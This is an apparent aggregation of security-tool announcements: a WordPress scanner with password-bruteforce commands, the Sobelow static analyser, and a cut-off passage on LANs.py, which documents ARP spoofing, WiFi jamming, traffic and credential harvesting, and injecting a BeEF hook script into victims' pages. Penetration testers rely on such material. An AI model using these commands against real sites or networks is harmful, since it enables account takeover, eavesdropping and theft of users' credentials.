WordPresscan – WPScan rewritten in Python + some WPSeku ideas

A simple WordPress scanner written in python based on the work of WPScan (Ruby version)Install & LaunchDependenciespip install requestspip install tornadoInstallgit clone https://github.com/swisskyrepo/Wordpresscan.gitcd WordPresscanExample 1 : Basic update and scan of a wordpresspython main.py -u “http://localhost/wordpress" –update –random-agent-u : Url of the WordPress–update : Update the wpscan database–aggressive : Launch an aggressive version to scan for plugins/themes–random-agent : Use a random user-agent for this sessionExample 2 : Basic bruteforce (option –brute, option –nocheck)python main.py -u "http://127.0.0.1/wordpress/" –brute fuzz/wordlist.lstpython main.py -u "http://127.0.0.1/wordpress/" –brute admin–brute file.lst : Will bruteforce every username and their password–brute username : Will bruteforce the password for the given usernameit will also try to bruteforce the password for the detected users.python main.py -u "http://127.0.0.1/wordpress/" –brute fuzz/wordlist.lst –nocheck _______________________________________________________________ _ _ _ | | | | | | | | | | ___ _ __ __| |_ __ _ __ ___ ___ ___ ___ __ _ _ __ | |/\| |/ _ \| ‘__/ _` | ‘_ \| ‘__/ _ \/ __/ __|/ __/ _` | ‘_ \\ /\ / (_) | | | (_| | |_) | | | __/\__ \__ \ (_| (_| | | | | \/ \/ \___/|_| \__,_| .__/|_| \___||___/___/\___\__,_|_| |_| | | |_| WordPress scanner based on wpscan work – @pentest_swissky _______________________________________________________________[+] URL: http://127.0.0.1/wordpress/[!] The WordPress ‘http://127.0.0.1/wordpress/readme.html’ file exposing a version number: 4.4.7[i] Uploads directory has directory listing enabled : http://127.0.0.1/wordpress/wp-content/uploads/[i] Includes directory has directory listing enabled : http://127.0.0.1/wordpress/wp-includes/[i] Bruteforcing all users[+] User found admin[+] Starting passwords bruteforce for adminBruteforcing – ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░Example 3 : Thinking is overrated, this is aggressive, mostly not advised!python main.py -u "http://127.0.0.1/wordpress/" –fuzz[i] Enumerating components from aggressive fuzzing …[i] File: http://127.0.0.1/wordpress/license.txt – found[i] File: http://127.0.0.1/wordpress/readme.html – found[i] File: http://127.0.0.1/wordpress/wp-admin/admin-footer.php – found[i] File: http://127.0.0.1/wordpress/wp-admin/css/ – found[i] File: http://127.0.0.1/wordpress/wp-admin/admin-ajax.php – found[i] File: http://127.0.0.1/wordpress/wp-activate.php – found–fuzz : Will fuzz the website in order to detect as much file, themes and plugins as possibleCredits and ContributormOriginal idea and script from WPScan TeamMany PR and bugfixes from bl4deDownload WordPresscan

Link: http://feedproxy.google.com/~r/PentestTools/~3/G4YlZ6aUkBw/wordpresscan-wpscan-rewritten-in-python.html

Sobelow – Security-Focused Static Analysis for the Phoenix Framework

Sobelow is a security-focused static analysis tool for the Phoenix framework. For security researchers, it is a useful tool for getting a quick view of points-of-interest. For project maintainers, it can be used to prevent introducing a number of common vulnerabilities.Currently Sobelow detects some types of the following security issues:Insecure configurationKnown-vulnerable DependenciesCross-Site ScriptingSQL injectionCommand injectionDenial of ServiceDirectory traversalUnsafe serializationPotential vulnerabilities are flagged in different colors according to confidence in their insecurity. High confidence is red, medium confidence is yellow, and low confidence is green.A finding is typically marked “low confidence" if it looks like a function could be used insecurely, but it cannot reliably be determined if the function accepts user-supplied input. That is to say, green findings are not secure, they just require greater manual validation.Note: This project is in constant development, and additional vulnerabilities will be flagged as time goes on. If you encounter a bug, or would like to request additional features or security checks, please open an issue!InstallationTo install Sobelow, you must have a working Elixir environment. Then, execute the following from the command line:$ mix archive.install hex sobelowYou may also install directly from GitHub with the following command:$ mix archive.install github nccgroup/sobelowUseThe simplest way to scan a Phoenix project is to run the following from the project root:$ mix sobelowOptions–root -r – Specify application root directory–with-code -v – Print vulnerable code snippets–ignore -i – Ignore modules–ignore-files – Ignore files–details -d – Get module details–all-details – Get all module details–private – Skip update checks–router – Specify router location–exit – Return non-zero exit status–format -f – Specify findings output format–quiet – Return no output if there are no findings–compact – Minimal, single-line findingsThe root option takes a path argument:$ mix sobelow –root ../my_projectThe with-code option takes no arguments:$ mix sobelow –with-codeThe ignore option takes a comma-separated list of modules:$ mix sobelow -i XSS.Raw,TraversalThe ignore-files option takes a comma-separated list of file names. File names should be absolute paths, or relative to the application root.$ mix sobelow –ignore-files config/prod.exsThe details option takes a single module:$ mix sobelow -d Config.CSRFThe exit option accepts a confidence threshold (low, medium, or high), and will return a non-zero exit status at or above that threshold.$ mix sobelow –exit LowThe format option accepts an output format for findings. Current formats include txt (the default) and json.Note: The json format option does not support the –with-code flag. All findings are organized by confidence level, and contain a "type" key. However, other keys may vary between finding types.$ mix sobelow –format jsonConfiguration FilesSobelow allows users to save frequently used options in a configuration file. For example, if you find yourself constantly running:$ mix sobelow -i XSS.Raw,Traversal –with-code –exit LowYou can use the –save-config flag to create your .sobelow-conf config file:$ mix sobelow -i XSS.Raw,Traversal –with-code –exit Low –save-configThis command will create the .sobelow-conf file at the root of your application. You can edit this file directly to make changes.Now if you want to run Sobelow with the saved configuration, you can run Sobelow with the –config flag.$ mix sobelow –configFalse PositivesSobelow favors over-reporting versus under-reporting. As such, you may find a number of false positives in a typical scan. These findings may be individually ignored by adding a # sobelow_skip comment, along with a list of modules, before the function definition.# sobelow_skip ["Traversal"]def vuln_func(…) do …endThen, run the scan with the –skip flag.$ mix sobelow –skipConfig and Vulnerable Dependency findings cannot be skipped in this way. For these, use the standard ignore option.ModulesFindings categories are broken up into modules. These modules can then be used to either ignore classes of findings (via the ignore and skip options) or to get vulnerability details (via the details option).This list, and other helpful information, can be found on the command line:$ mix help sobelowUpdatesWhen scanning a project, Sobelow will occasionally check for updates, and will print an alert if a new version is available. Sobelow keeps track of the last update-check by creating a .sobelow file in the root of the scanned project.If this functionality is not desired, the –private flag can be used with the scan.$ mix sobelow –privateDownload Sobelow

Link: http://feedproxy.google.com/~r/PentestTools/~3/w1yDssiShnE/sobelow-security-focused-static.html

LANs.py – Inject Code, Jam Wifi, And Spy on Wifi Users

LANs.pyAutomatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit. Individually poisons the ARP tables of the target box, the router and the DNS server if necessary. Does not poison anyone else on the network. Displays all most the interesting bits of their traffic and can inject custom html into pages they visit. Cleans up after itself.Also can be used to continuously jam nearby WiFi networks. This has an approximate range of a 1 block radius, but this can vary based off of the strength of your WiFi card. This can be fine-tuned to allow jamming of everyone or even just one client. Cannot jam WiFi and spy simultaneously. Prerequisites: Linux, python-scapy, python-nfqueue (nfqueue-bindings 0.4-3), aircrack-ng, python-twisted, BeEF (optional), nmap, nbtscan, tcpdump, and a wireless card capable of promiscuous mode if you don’t know the IP of your target.Tested on Kali. In the following examples 192.168.0.5 will be the attacking machine and 192.168.0.10 will be the victim.All options:Python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-a] [-set] [-p] [-na] [-n] [-i INTERFACE] [-r REDIRECTTO] [-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP] [-s SKIP] [-ch CHANNEL] [-m MAXIMUM] [-no] [-t TIMEINTERVAL] [–packets PACKETS] [–directedonly] [–accesspoint ACCESSPOINT]UsageCommon usage:python LANs.py -u -pActive target identification which ARP spoofs the chosen target and outputs all the interesting non-HTTPS data they send or request. There’s no -ip option so this will ARP scan the network, compare it to a live running promiscuous capture, and list all the clients on the network. Attempts to tag the targets with a Windows netbios name and prints how many data packets they are sending/receiving. The ability to capture data packets they send is very dependent on physical proximity and the power of your network card. Ctrl-C when you’re ready and pick your target which it will then ARP spoof.Supports interception and harvesting of data from the following protocols: HTTP, FTP, IMAP, POP3, IRC. Will print the first 135 characters of URLs visited and ignore URLs ending in .jpg, .jpeg, .gif, .css, .ico, .js, .svg, and .woff. Will also print all protocol username/passwords entered, searches made on any site, emails sent/received, and IRC messages sent/received.Screenshot: Running LANs.py without argument will give you the list of active targets and upon selecting one, it will act as a simple ARP spoofer.Another common usage:python LANs.py -u -p -d -ip 192.168.0.10-d: open an xterm with driftnet to see all images they view-ip: target this IP address and skip the active targeting at the beginningHTML injection:python LANs.py -b http://192.168.0.5:3000/hook.jsInject a BeEF hook URL (http://beefproject.com/, tutorial: http://resources.infosecinstitute.com/beef-part-1/) into pages the victim visits. This just wraps the argument in